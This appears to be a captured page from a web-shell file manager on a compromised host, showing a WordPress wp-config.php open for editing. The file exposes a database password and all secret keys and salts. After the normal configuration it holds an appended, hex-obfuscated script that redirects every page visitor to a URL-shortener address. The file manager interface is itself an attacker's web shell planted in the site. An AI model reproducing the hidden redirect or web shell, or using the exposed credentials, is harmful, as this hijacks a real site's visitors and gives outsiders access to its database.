BossBey File Manager
PHP:
8.1.34
OS:
Linux
User:
ebookghostwritin
Root
/
home
/
demodesignproboa
/
public_html
/
b4electrical
/
v2
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'demodesignproboa_b4electricalv2' ); /** Database username */ define( 'DB_USER', 'demodesignproboa_b4electricalv2' ); /** Database password */ define( 'DB_PASSWORD', 'B?7*(Rf7F?=^' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '21&8CU+)sZ)vqm6xod5S8#O%V5t{Q||@.#2KY;oF[t#y2#;q?>5e1rv}s2|9c81t' ); define( 'SECURE_AUTH_KEY', 'D$ISA[%<M,V?H+H<y5!f^J]i3HPYkTyK*]u+&9pOKT;v<c3kQRU;](;?yn[n9!8q' ); define( 'LOGGED_IN_KEY', 'UjRWQbKOFR^!&b%zQe5t.XM[t1Zv=ehE5t4LaOI8OP.(!4QcV[1(zT/6a{h!2{O^' ); define( 'NONCE_KEY', '6K92(%y#FFv4[|8>LXOXNBr%H`csIEW9&6*l/8B_;V[K$Lh(;Lk~B29D1}=9&5zi' ); define( 'AUTH_SALT', 'T76wQo=Hl)BXhh*n$*nM]gyox.gol>>J$Ys{TRHi=d{oCuc[=n(-b=>tW.qaF8ax' ); define( 'SECURE_AUTH_SALT', 'C4O]3I(1!V)WCPxSzCh+r_F6Z90N*jNpCTf?Bsq@=+eKx.FDTLErYZcVV0W@o)<8' ); define( 'LOGGED_IN_SALT', ' c3&HK!J3CK7o:hHRvhz?,L8#vI W/K+u+r?EHO~W9sTt-YDg83HmE?([9tfa0p=' ); define( 'NONCE_SALT', 'Vqoq8>+C1)kSX]e^G~{(otyv[VP>gaQ>ObPE]`LAL3E-LSr2#U-rvWEUT(iH-Si%' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; ob_start(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x6a\x73\x55\x79\x7a\x68\x53\x30\x72\x30";</script>
Save
Cancel